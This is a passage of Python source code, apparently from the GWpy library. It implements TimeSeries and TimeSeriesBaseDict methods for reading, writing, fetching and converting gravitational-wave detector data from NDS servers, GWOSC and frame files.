This attribute is stored internally by the `dx` attribute\n\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n return (1 / self.dt).to('Hertz')\n\n @sample_rate.setter\n def sample_rate(self, val):\n if val is None:\n del self.dt\n return\n self.dt = (1 / units.Quantity(val, units.Hertz)).to(self.xunit)\n\n # -- duration\n @property\n def duration(self):\n \"\"\"Duration of this series in seconds\n\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n return units.Quantity(self.span[1] - self.span[0], self.xunit,\n dtype=float)\n\n # -- TimeSeries accessors -------------------\n\n @classmethod\n def read(cls, source, *args, **kwargs):\n \"\"\"Read data into a `TimeSeries`\n\n Arguments and keywords depend on the output format, see the\n online documentation for full details for each format, the parameters\n below are common to most formats.\n\n Parameters\n ----------\n source : `str`, `list`\n Source of data, any of the following:\n\n - `str` path of single data file,\n - `str` path of LAL-format cache file,\n - `list` of paths.\n\n name : `str`, `~gwpy.detector.Channel`\n the name of the channel to read, or a `Channel` object.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS start time of required data, defaults to start of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n format : `str`, optional\n source format identifier. If not given, the format will be\n detected if possible. See below for list of acceptable\n formats.\n\n nproc : `int`, optional\n number of parallel processes to use, serial process by\n default.\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n Raises\n ------\n IndexError\n if ``source`` is an empty list\n\n Notes\n -----\"\"\"\n from .io.core import read as timeseries_reader\n return timeseries_reader(cls, source, *args, **kwargs)\n\n def write(self, target, *args, **kwargs):\n \"\"\"Write this `TimeSeries` to a file\n\n Parameters\n ----------\n target : `str`\n path of output file\n\n format : `str`, optional\n output format identifier. If not given, the format will be\n detected if possible. 
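# The `sample_rate` property above converts between `dt` and a rate purely
# through astropy units: (1 / dt) in Hertz one way, (1 / rate) in seconds the
# other. A small self-contained round trip showing the same arithmetic:
from astropy import units

dt = 0.000244140625 * units.second        # 1/4096 s, the GWOSC strain spacing
rate = (1 / dt).to('Hertz')               # -> 4096.0 Hz
assert (1 / rate).to(units.second) == dt  # inverting recovers the original dt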
See below for list of acceptable\n formats.\n\n Notes\n -----\"\"\"\n return io_registry.write(self, target, *args, **kwargs)\n\n @classmethod\n def fetch(cls, channel, start, end, host=None, port=None, verbose=False,\n connection=None, verify=False, pad=None, allow_tape=None,\n scaled=None, type=None, dtype=None):\n \"\"\"Fetch data from NDS\n\n Parameters\n ----------\n channel : `str`, `~gwpy.detector.Channel`\n the data channel for which to query\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS end time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n host : `str`, optional\n URL of NDS server to use, if blank will try any server\n (in a relatively sensible order) to get the data\n\n port : `int`, optional\n port number for NDS server query, must be given with `host`\n\n verify : `bool`, optional, default: `False`\n check channels exist in database before asking for data\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect\n\n connection : `nds2.connection`, optional\n open NDS connection to use\n\n verbose : `bool`, optional\n print verbose output about NDS progress, useful for debugging;\n if ``verbose`` is specified as a string, this defines the\n prefix for the progress meter\n\n type : `int`, optional\n NDS2 channel type integer or string name to match\n\n dtype : `type`, `numpy.dtype`, `str`, optional\n NDS2 data type to match\n \"\"\"\n return cls.DictClass.fetch(\n [channel], start, end, host=host, port=port, verbose=verbose,\n connection=connection, verify=verify, pad=pad, scaled=scaled,\n allow_tape=allow_tape, type=type, dtype=dtype)[str(channel)]\n\n @classmethod\n def fetch_open_data(cls, ifo, start, end, sample_rate=4096,\n version=None, format='hdf5',\n host=GWOSC_DEFAULT_HOST, verbose=False,\n cache=None, **kwargs):\n \"\"\"Fetch open-access data from the LIGO Open Science Center\n\n Parameters\n ----------\n ifo : `str`\n the two-character prefix of the IFO in which you are interested,\n e.g. 
`'L1'`\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS start time of required data, defaults to start of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n sample_rate : `float`, optional,\n the sample rate of desired data; most data are stored\n by GWOSC at 4096 Hz, however there may be event-related\n data releases with a 16384 Hz rate, default: `4096`\n\n version : `int`, optional\n version of files to download, defaults to highest discovered\n version\n\n format : `str`, optional\n the data format to download and parse, default: ``'h5py'``\n\n - ``'hdf5'``\n - ``'gwf'`` - requires |LDAStools.frameCPP|_\n\n host : `str`, optional\n HTTP host name of GWOSC server to access\n\n verbose : `bool`, optional, default: `False`\n print verbose output while fetching data\n\n cache : `bool`, optional\n save/read a local copy of the remote URL, default: `False`;\n useful if the same remote data are to be accessed multiple times.\n Set `GWPY_CACHE=1` in the environment to auto-cache.\n\n **kwargs\n any other keyword arguments are passed to the `TimeSeries.read`\n method that parses the file that was downloaded\n\n Examples\n --------\n >>> from gwpy.timeseries import (TimeSeries, StateVector)\n >>> print(TimeSeries.fetch_open_data('H1', 1126259446, 1126259478))\n TimeSeries([ 2.17704028e-19, 2.08763900e-19, 2.39681183e-19,\n ..., 3.55365541e-20, 6.33533516e-20,\n 7.58121195e-20]\n unit: Unit(dimensionless),\n t0: 1126259446.0 s,\n dt: 0.000244140625 s,\n name: Strain,\n channel: None)\n >>> print(StateVector.fetch_open_data('H1', 1126259446, 1126259478))\n StateVector([127,127,127,127,127,127,127,127,127,127,127,127,\n 127,127,127,127,127,127,127,127,127,127,127,127,\n 127,127,127,127,127,127,127,127]\n unit: Unit(dimensionless),\n t0: 1126259446.0 s,\n dt: 1.0 s,\n name: Data quality,\n channel: None,\n bits: Bits(0: data present\n 1: passes cbc CAT1 test\n 2: passes cbc CAT2 test\n 3: passes cbc CAT3 test\n 4: passes burst CAT1 test\n 5: passes burst CAT2 test\n 6: passes burst CAT3 test,\n channel=None,\n epoch=1126259446.0))\n\n For the `StateVector`, the naming of the bits will be\n ``format``-dependent, because they are recorded differently by GWOSC\n in different formats.\n\n Notes\n -----\n `StateVector` data are not available in ``txt.gz`` format.\n \"\"\"\n from .io.losc import fetch_gwosc_data\n return fetch_gwosc_data(\n ifo,\n start,\n end,\n sample_rate=sample_rate,\n version=version,\n format=format,\n verbose=verbose,\n cache=cache,\n host=host,\n cls=cls,\n **kwargs,\n )\n\n @classmethod\n def find(cls, channel, start, end, frametype=None, pad=None,\n scaled=None, nproc=1, verbose=False, **readargs):\n \"\"\"Find and read data from frames for a channel\n\n Parameters\n ----------\n channel : `str`, `~gwpy.detector.Channel`\n the name of the channel to read, or a `Channel` object.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS end time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n frametype : `str`, optional\n name of frametype in which this channel is stored, will search\n for containing frame types if necessary\n\n nproc : `int`, optional, default: `1`\n number of parallel processes to use, 
serial process by\n default.\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n allow_tape : `bool`, optional, default: `True`\n allow reading from frame files on (slow) magnetic tape\n\n verbose : `bool`, optional\n print verbose output about read progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter\n\n **readargs\n any other keyword arguments to be passed to `.read()`\n \"\"\"\n return cls.DictClass.find(\n [channel], start, end,\n frametype=frametype,\n verbose=verbose,\n pad=pad,\n scaled=scaled,\n nproc=nproc,\n **readargs\n )[str(channel)]\n\n @classmethod\n def get(cls, channel, start, end, pad=None, scaled=None,\n dtype=None, verbose=False, allow_tape=None, **kwargs):\n \"\"\"Get data for this channel from frames or NDS\n\n This method dynamically accesses either frames on disk, or a\n remote NDS2 server to find and return data for the given interval\n\n Parameters\n ----------\n channel : `str`, `~gwpy.detector.Channel`\n the name of the channel to read, or a `Channel` object.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS end time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect\n\n nproc : `int`, optional, default: `1`\n number of parallel processes to use, serial process by\n default.\n\n allow_tape : `bool`, optional, default: `None`\n allow the use of frames that are held on tape, default is `None`\n to attempt to allow the `TimeSeries.fetch` method to\n intelligently select a server that doesn't use tapes for\n data storage (doesn't always work), but to eventually allow\n retrieving data from tape if required\n\n verbose : `bool`, optional\n print verbose output about data access progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter\n\n **kwargs\n other keyword arguments to pass to either\n :meth:`.find` (for direct GWF file access) or\n :meth:`.fetch` for remote NDS2 access\n\n See also\n --------\n TimeSeries.fetch\n for grabbing data from a remote NDS2 server\n TimeSeries.find\n for discovering and reading data from local GWF files\n \"\"\"\n return cls.DictClass.get(\n [channel], start, end, pad=pad, scaled=scaled, dtype=dtype,\n verbose=verbose, allow_tape=allow_tape, **kwargs)[str(channel)]\n\n # -- utilities ------------------------------\n\n def plot(self, method='plot', figsize=(12, 4), xscale='auto-gps',\n **kwargs):\n \"\"\"Plot the data for this timeseries\n\n Returns\n -------\n figure : `~matplotlib.figure.Figure`\n the newly created figure, with populated Axes.\n\n See also\n --------\n matplotlib.pyplot.figure\n for documentation of keyword arguments used to create the\n figure\n matplotlib.figure.Figure.add_subplot\n for documentation of keyword arguments used to create the\n axes\n matplotlib.axes.Axes.plot\n for documentation of keyword arguments used in rendering the data\n \"\"\"\n kwargs.update(figsize=figsize, xscale=xscale)\n return super().plot(method=method, **kwargs)\n\n @classmethod\n def from_nds2_buffer(cls, buffer_, scaled=None, copy=True, 
**metadata):\n \"\"\"Construct a new series from an `nds2.buffer` object\n\n **Requires:** |nds2|_\n\n Parameters\n ----------\n buffer_ : `nds2.buffer`\n the input NDS2-client buffer to read\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect\n\n copy : `bool`, optional\n if `True`, copy the contained data array to new to a new array\n\n **metadata\n any other metadata keyword arguments to pass to the `TimeSeries`\n constructor\n\n Returns\n -------\n timeseries : `TimeSeries`\n a new `TimeSeries` containing the data from the `nds2.buffer`,\n and the appropriate metadata\n \"\"\"\n # get Channel from buffer\n channel = Channel.from_nds2(buffer_.channel)\n\n # set default metadata\n metadata.setdefault('channel', channel)\n metadata.setdefault('epoch', LIGOTimeGPS(buffer_.gps_seconds,\n buffer_.gps_nanoseconds))\n metadata.setdefault('sample_rate', channel.sample_rate)\n metadata.setdefault('unit', channel.unit)\n metadata.setdefault('name', buffer_.name)\n\n # unwrap data\n scaled = _dynamic_scaled(scaled, channel.name)\n slope = buffer_.signal_slope\n offset = buffer_.signal_offset\n null_scaling = slope == 1. and offset == 0.\n if scaled and not null_scaling:\n data = buffer_.data.copy() * slope + offset\n copy = False\n else:\n data = buffer_.data\n\n # construct new TimeSeries-like object\n return cls(data, copy=copy, **metadata)\n\n @classmethod\n def from_lal(cls, lalts, copy=True):\n \"\"\"Generate a new TimeSeries from a LAL TimeSeries of any type.\n \"\"\"\n # convert the units\n from ..utils.lal import (from_lal_unit, from_lal_type)\n unit = from_lal_unit(lalts.sampleUnits)\n\n try:\n dtype = lalts.data.data.dtype\n except AttributeError: # no data\n dtype = from_lal_type(lalts)\n data = []\n else:\n data = lalts.data.data\n\n # create new series\n out = cls(\n data,\n dtype=dtype,\n name=lalts.name or None,\n unit=unit,\n t0=lalts.epoch,\n dt=lalts.deltaT,\n channel=None,\n copy=False,\n )\n\n if copy:\n return out.copy()\n return out\n\n def to_lal(self):\n \"\"\"Convert this `TimeSeries` into a LAL TimeSeries.\n\n .. 
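# `from_nds2_buffer` above applies the NDS2 slope/offset calibration only
# when it would change the data: for slope 1 and offset 0 the raw array is
# kept, otherwise a scaled copy is made (so no second copy is needed). A
# numpy-only sketch of that guard; the names are illustrative, not gwpy API.
import numpy

def apply_calibration(raw, slope, offset, copy=True):
    if slope == 1. and offset == 0.:
        return raw.copy() if copy else raw   # null scaling: keep raw counts
    return raw * slope + offset              # scaling already makes a new array

counts = numpy.array([1., 2., 3.])
print(apply_calibration(counts, slope=0.5, offset=-1.0))   # [-0.5  0.   0.5]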
note::\n\n This operation always copies data to new memory.\n \"\"\"\n import lal\n from ..utils.lal import (find_typed_function, to_lal_unit)\n\n # map unit\n try:\n unit, scale = to_lal_unit(self.unit)\n except ValueError as exc:\n warnings.warn(f\"{exc}, defaulting to lal.DimensionlessUnit\")\n unit = lal.DimensionlessUnit\n scale = 1\n\n # create TimeSeries\n create = find_typed_function(self.dtype, 'Create', 'TimeSeries')\n lalts = create(\n self.name or str(self.channel or \"\") or None,\n LIGOTimeGPS(to_gps(self.epoch.gps)),\n 0,\n self.dt.value,\n unit,\n self.shape[0],\n )\n\n # assign data\n lalts.data.data = self.value\n if scale != 1:\n lalts.data.data *= scale\n\n return lalts\n\n @classmethod\n def from_pycbc(cls, pycbcseries, copy=True):\n \"\"\"Convert a `pycbc.types.timeseries.TimeSeries` into a `TimeSeries`\n\n Parameters\n ----------\n pycbcseries : `pycbc.types.timeseries.TimeSeries`\n the input PyCBC `~pycbc.types.timeseries.TimeSeries` array\n\n copy : `bool`, optional, default: `True`\n if `True`, copy these data to a new array\n\n Returns\n -------\n timeseries : `TimeSeries`\n a GWpy version of the input timeseries\n \"\"\"\n return cls(pycbcseries.data, t0=pycbcseries.start_time,\n dt=pycbcseries.delta_t, copy=copy)\n\n def to_pycbc(self, copy=True):\n \"\"\"Convert this `TimeSeries` into a PyCBC\n `~pycbc.types.timeseries.TimeSeries`\n\n Parameters\n ----------\n copy : `bool`, optional, default: `True`\n if `True`, copy these data to a new array\n\n Returns\n -------\n timeseries : `~pycbc.types.timeseries.TimeSeries`\n a PyCBC representation of this `TimeSeries`\n \"\"\"\n from pycbc import types\n return types.TimeSeries(self.value,\n delta_t=self.dt.to('s').value,\n epoch=self.epoch.gps, copy=copy)\n\n # -- TimeSeries operations ------------------\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):\n out = super().__array_ufunc__(ufunc, method, *inputs, **kwargs)\n if out.dtype is numpy.dtype(bool) and len(inputs) == 2:\n from .statevector import StateTimeSeries\n orig, value = inputs\n try:\n op_ = _UFUNC_STRING[ufunc.__name__]\n except KeyError:\n op_ = ufunc.__name__\n out = out.view(StateTimeSeries)\n out.__metadata_finalize__(orig)\n out.override_unit('')\n oname = orig.name if isinstance(orig, type(self)) else orig\n vname = value.name if isinstance(value, type(self)) else value\n out.name = '{0!s} {1!s} {2!s}'.format(oname, op_, vname)\n return out\n\n # Quantity overrides __eq__ and __ne__ in a way that doesn't work for us,\n # so we just undo that\n def __eq__(self, other):\n return numpy.ndarray.__eq__(self, other)\n\n def __ne__(self, other):\n return numpy.ndarray.__ne__(self, other)\n\n\n# -- TimeSeriesBaseDict -------------------------------------------------------\n\ndef as_series_dict_class(seriesclass):\n \"\"\"Decorate a `dict` class to declare itself as the `DictClass` for\n its `EntryClass`\n\n This method should be used to decorate sub-classes of the\n `TimeSeriesBaseDict` to provide a reference to that class from the\n relevant subclass of `TimeSeriesBase`.\n \"\"\"\n def decorate_class(cls):\n \"\"\"Set ``cls`` as the `DictClass` attribute for this series type\n \"\"\"\n seriesclass.DictClass = cls\n return cls\n return decorate_class\n\n\n@as_series_dict_class(TimeSeriesBase)\nclass TimeSeriesBaseDict(OrderedDict):\n \"\"\"Ordered key-value mapping of named `TimeSeriesBase` objects\n\n This object is designed to hold data for many different sources (channels)\n for a single time span.\n\n The main entry points for this 
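# The `as_series_dict_class` decorator above is a parameterised class
# decorator that wires a dict container class back onto its entry class. A
# minimal standalone sketch of the same two-way registration, with
# hypothetical class names:
def register_container(entry_cls):
    def decorate(container_cls):
        entry_cls.DictClass = container_cls   # entry class learns its container
        return container_cls
    return decorate

class Sample:
    DictClass = None

@register_container(Sample)
class SampleDict(dict):
    EntryClass = Sample

assert Sample.DictClass is SampleDict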
object are the\n :meth:`~TimeSeriesBaseDict.read` and :meth:`~TimeSeriesBaseDict.fetch`\n data access methods.\n \"\"\"\n EntryClass = TimeSeriesBase\n\n @property\n def span(self):\n \"\"\"The GPS ``[start, stop)`` extent of data in this `dict`\n\n :type: `~gwpy.segments.Segment`\n \"\"\"\n span = SegmentList()\n for value in self.values():\n span.append(value.span)\n try:\n return span.extent()\n except ValueError as exc: # empty list\n exc.args = (\n 'cannot calculate span for empty {0}'.format(\n type(self).__name__),\n )\n raise\n\n @classmethod\n def read(cls, source, *args, **kwargs):\n \"\"\"Read data for multiple channels into a `TimeSeriesDict`\n\n Parameters\n ----------\n source : `str`, `list`\n Source of data, any of the following:\n\n - `str` path of single data file,\n - `str` path of LAL-format cache file,\n - `list` of paths.\n\n channels : `~gwpy.detector.channel.ChannelList`, `list`\n a list of channels to read from the source.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str` optional\n GPS start time of required data, anything parseable by\n :func:`~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, anything parseable by\n :func:`~gwpy.time.to_gps` is fine\n\n format : `str`, optional\n source format identifier. If not given, the format will be\n detected if possible. See below for list of acceptable\n formats.\n\n nproc : `int`, optional\n number of parallel processes to use, serial process by\n default.\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n Returns\n -------\n tsdict : `TimeSeriesDict`\n a `TimeSeriesDict` of (`channel`, `TimeSeries`) pairs. The keys\n are guaranteed to be the ordered list `channels` as given.\n\n Notes\n -----\"\"\"\n from .io.core import read as timeseries_reader\n return timeseries_reader(cls, source, *args, **kwargs)\n\n def write(self, target, *args, **kwargs):\n \"\"\"Write this `TimeSeriesDict` to a file\n\n Arguments and keywords depend on the output format, see the\n online documentation for full details for each format.\n\n Parameters\n ----------\n target : `str`\n output filename\n\n format : `str`, optional\n output format identifier. If not given, the format will be\n detected if possible. 
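# The `span` property above wraps each entry's [start, stop) in a
# SegmentList and returns its overall extent, raising on an empty dict. The
# same reduction with plain (start, stop) tuples:
def extent(spans):
    if not spans:
        raise ValueError('cannot calculate span for an empty container')
    return (min(s[0] for s in spans), max(s[1] for s in spans))

print(extent([(0, 16), (8, 32)]))   # (0, 32)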
See below for list of acceptable\n formats.\n\n Notes\n -----\"\"\"\n return io_registry.write(self, target, *args, **kwargs)\n\n def __iadd__(self, other):\n return self.append(other)\n\n def copy(self):\n \"\"\"Return a copy of this dict with each value copied to new memory\n \"\"\"\n new = self.__class__()\n for key, val in self.items():\n new[key] = val.copy()\n return new\n\n def append(self, other, copy=True, **kwargs):\n \"\"\"Append the dict ``other`` to this one\n\n Parameters\n ----------\n other : `dict` of `TimeSeries`\n the container to append to this one\n\n copy : `bool`, optional\n if `True` copy data from ``other`` before storing, only\n affects those keys in ``other`` that aren't in ``self``\n\n **kwargs\n other keyword arguments to send to `TimeSeries.append`\n\n See also\n --------\n TimeSeries.append\n for details of the underlying series append operation\n \"\"\"\n for key, series in other.items():\n if key in self:\n self[key].append(series, **kwargs)\n elif copy:\n self[key] = series.copy()\n else:\n self[key] = series\n return self\n\n def prepend(self, other, **kwargs):\n \"\"\"Prepend the dict ``other`` to this one\n\n Parameters\n ----------\n other : `dict` of `TimeSeries`\n the container to prepend to this one\n\n copy : `bool`, optional\n if `True` copy data from ``other`` before storing, only\n affects those keys in ``other`` that aren't in ``self``\n\n **kwargs\n other keyword arguments to send to `TimeSeries.prepend`\n\n See also\n --------\n TimeSeries.prepend\n for details of the underlying series prepend operation\n \"\"\"\n for key, series in other.items():\n if key in self:\n self[key].prepend(series, **kwargs)\n else:\n self[key] = series\n return self\n\n def crop(self, start=None, end=None, copy=False):\n \"\"\"Crop each entry of this `dict`.\n\n This method calls the :meth:`crop` method of all entries and\n modifies this dict in place.\n\n Parameters\n ----------\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n copy : `bool`, optional, default: `False`\n If `True` copy the data for each entry to fresh memory,\n otherwise return a view.\n\n See also\n --------\n TimeSeries.crop\n for more details\n \"\"\"\n for key, val in self.items():\n self[key] = val.crop(start=start, end=end, copy=copy)\n return self\n\n def resample(self, rate, **kwargs):\n \"\"\"Resample items in this dict.\n\n This operation over-writes items inplace.\n\n Parameters\n ----------\n rate : `dict`, `float`\n either a `dict` of (channel, `float`) pairs for key-wise\n resampling, or a single float/int to resample all items.\n\n **kwargs\n other keyword arguments to pass to each item's resampling\n method.\n \"\"\"\n if not isinstance(rate, dict):\n rate = dict((c, rate) for c in self)\n for key, resamp in rate.items():\n self[key] = self[key].resample(resamp, **kwargs)\n return self\n\n @classmethod\n def fetch(cls, channels, start, end, host=None, port=None,\n verify=False, verbose=False, connection=None,\n pad=None, scaled=None, allow_tape=None, type=None,\n dtype=None):\n \"\"\"Fetch data from NDS for a number of channels.\n\n Parameters\n ----------\n channels : `list`\n required data channels.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by 
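# `resample` above accepts either one rate for every key or a per-key
# mapping, normalising the scalar case into a dict before looping. The same
# broadcast idiom in isolation (hypothetical helper name):
def normalise_rates(rate, keys):
    if not isinstance(rate, dict):          # a bare number applies to all keys
        rate = {key: rate for key in keys}
    return rate

print(normalise_rates(128, ['H1:A', 'L1:B']))   # {'H1:A': 128, 'L1:B': 128}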
`~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n host : `str`, optional\n URL of NDS server to use, if blank will try any server\n (in a relatively sensible order) to get the data\n\n port : `int`, optional\n port number for NDS server query, must be given with `host`.\n\n verify : `bool`, optional, default: `True`\n check channels exist in database before asking for data\n\n verbose : `bool`, optional\n print verbose output about NDS download progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter\n\n connection : `nds2.connection`, optional\n open NDS connection to use.\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect.\n\n allow_tape : `bool`, optional\n allow data access from slow tapes. If `host` or `connection` is\n given, the default is to do whatever the server default is,\n otherwise servers will be searched in logical order allowing tape\n access if necessary to retrieve the data\n\n type : `int`, `str`, optional\n NDS2 channel type integer or string name to match.\n\n dtype : `numpy.dtype`, `str`, `type`, or `dict`\n NDS2 data type to match\n\n Returns\n -------\n data : :class:`~gwpy.timeseries.TimeSeriesBaseDict`\n a new `TimeSeriesBaseDict` of (`str`, `TimeSeries`) pairs fetched\n from NDS.\n \"\"\"\n from ..io import nds2 as io_nds2\n from .io.nds2 import (print_verbose, fetch)\n\n if dtype is None:\n dtype = {}\n\n # -- open a connection ------------------\n\n # open connection to specific host\n if connection is None and host is not None:\n print_verbose(\"Opening new connection to {0}...\".format(host),\n end=' ', verbose=verbose)\n connection = io_nds2.auth_connect(host, port)\n print_verbose('connected', verbose=verbose)\n # otherwise cycle through connections in logical order\n elif connection is None:\n ifos = set([Channel(channel).ifo for channel in channels])\n if len(ifos) == 1:\n ifo = list(ifos)[0]\n else:\n ifo = None\n hostlist = io_nds2.host_resolution_order(ifo, epoch=start)\n if allow_tape is None:\n tapes = [False, True]\n else:\n tapes = [allow_tape]\n for allow_tape_ in tapes:\n error = \"\" # container for error message from cls.fetch()\n for host_, port_ in hostlist:\n try:\n return cls.fetch(channels, start, end, host=host_,\n port=port_, verbose=verbose,\n type=type, dtype=dtype, pad=pad,\n scaled=scaled, allow_tape=allow_tape_)\n except (RuntimeError, ValueError) as exc:\n error = str(exc) # need to assign to take out of scope\n msg = error.split('\\n', 1)[0]\n warnings.warn(\n f\"failed to fetch data for {', '.join(channels)} \"\n f\"in interval [{start}, {end}): {msg}\",\n io_nds2.NDSWarning,\n )\n\n # if failing occurred because of data on tape, don't try\n # reading channels individually, the same error will occur\n if not allow_tape_ and 'Requested data is on tape' in error:\n continue\n\n # if we got this far, we can't get all channels in one go\n if len(channels) > 1:\n return cls(\n (c, cls.EntryClass.fetch(c, start, end,\n verbose=verbose, type=type,\n verify=verify,\n dtype=dtype.get(c), pad=pad,\n scaled=scaled,\n allow_tape=allow_tape_))\n for c in channels)\n err = \"Cannot find all relevant data on any known server.\"\n if not verbose:\n err += (\" Try again using the verbose=True keyword argument \"\n \" to see detailed failures.\")\n raise 
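# The connection fallback above walks a resolved list of (host, port) pairs,
# keeping the last error message and only raising once every server has been
# tried. The try-each-server skeleton on its own; `connect` is a
# hypothetical callable standing in for the real fetch:
def first_working(hostlist, connect):
    error = ''
    for host, port in hostlist:
        try:
            return connect(host, port)
        except (RuntimeError, ValueError) as exc:
            error = str(exc)   # remember the latest failure for the final error
    raise RuntimeError(f'no server could provide the data: {error}')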
RuntimeError(err)\n\n # -- at this point we have an open connection, so perform fetch\n\n start = to_gps(start)\n end = to_gps(end)\n istart = int(start)\n iend = int(ceil(end))\n\n return fetch(channels, istart, iend, connection=connection,\n host=host, port=port, verbose=verbose, type=type,\n dtype=dtype, pad=pad, allow_tape=allow_tape,\n scaled=scaled,\n series_class=cls.EntryClass).crop(start, end)\n\n @classmethod\n def find(cls, channels, start, end, frametype=None,\n frametype_match=None, pad=None, scaled=None, nproc=1,\n verbose=False, allow_tape=True, observatory=None, **readargs):\n \"\"\"Find and read data from frames for a number of channels.\n\n This method uses :mod:`gwdatafind` to discover the (`file://`) URLs\n that provide the requested data, then reads those files using\n :meth:`TimeSeriesDict.read()`.\n\n Parameters\n ----------\n channels : `list`\n Required data channels.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n frametype : `str`\n Name of frametype in which this channel is stored; if not given\n all frametypes discoverable via GWDataFind will be searched for\n the required channels.\n\n frametype_match : `str`\n Regular expression to use for frametype matching.\n\n pad : `float`\n Value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n scaled : `bool`\n Apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect.\n\n nproc : `int`\n Number of parallel processes to use.\n\n allow_tape : `bool`\n Allow reading from frame files on (slow) magnetic tape.\n\n verbose : `bool`, optional\n Print verbose output about read progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter.\n\n readargs\n Any other keyword arguments to be passed to `.read()`.\n\n Raises\n ------\n requests.exceptions.HTTPError\n If the GWDataFind query fails for any reason.\n\n RuntimeError\n If no files are found to read, or if the read operation\n fails.\n \"\"\"\n from ..io import datafind as io_datafind\n\n start = to_gps(start)\n end = to_gps(end)\n\n # -- find frametype(s)\n\n frametypes = {}\n\n if frametype is None:\n matched = io_datafind.find_best_frametype(\n channels,\n start,\n end,\n frametype_match=frametype_match,\n allow_tape=allow_tape,\n )\n\n # flip dict to frametypes with a list of channels\n for name, ftype in matched.items():\n try:\n frametypes[ftype].append(name)\n except KeyError:\n frametypes[ftype] = [name]\n\n if verbose and len(frametypes) > 1:\n gprint(f\"Determined {len(frametypes)} frametypes to read\")\n elif verbose:\n gprint(f\"Determined best frametype as '{list(frametypes)[0]}'\")\n else: # use the given frametype for all channels\n frametypes[frametype] = channels\n\n # -- read data\n\n out = cls()\n for frametype, clist in frametypes.items():\n if verbose:\n verbose = f\"Reading '{frametype}' data\"\n\n # parse as a ChannelList\n channellist = ChannelList.from_names(*clist)\n # strip trend tags from channel names\n names = [c.name for c in channellist]\n\n # find observatory for this group\n if observatory is None:\n try:\n observatory = ''.join(\n sorted(set(c.ifo[0] for c in channellist)))\n except TypeError as exc:\n raise ValueError(\n \"Cannot parse list of IFOs from 
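# The tail of `fetch` above widens the request to whole GPS seconds with
# int(start) and ceil(end), because NDS serves integer-aligned blocks, and
# then crops the result back to the exact span requested. The same
# expand-then-trim arithmetic on plain numbers:
from math import ceil

start, end = 1126259446.25, 1126259447.75
istart, iend = int(start), int(ceil(end))
assert (istart, iend) == (1126259446, 1126259448)   # request this, crop after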
